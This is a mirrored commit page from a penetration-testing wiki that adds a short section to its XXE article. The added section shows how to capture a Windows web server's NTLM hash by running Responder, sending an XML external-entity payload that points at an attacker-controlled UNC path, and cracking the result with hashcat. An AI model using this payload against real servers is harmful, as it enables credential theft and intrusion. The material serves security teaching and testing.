Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

Updated XXE attacks by adding NTLM

Browse source 
Updated XXE attacks by adding a method to get NTML hash on Windows hosts
This commit is contained in:
Lorenzo Grazian 2022-05-07 17:52:17 +02:00 committed by GitHub
parent 06e3bda49a
commit e3c2d3ed88
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 19 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
pentesting-web/xxe-xee-xml-external-entity.md
View file

@ -423,6 +423,25 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
![](<../.gitbook/assets/image (531).png>)
### Getting NTML
On Windows hosts it is possible to get the NTML hash of the web server user by setting a responder.py handler:
```
Responder.py -I eth0 -v
```
and by sending the following request
```
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'> ]>
<data>&example;</data>
```
Then you can try to crack the hash using hashcat
# Hidden XXE Surfaces
## XInclude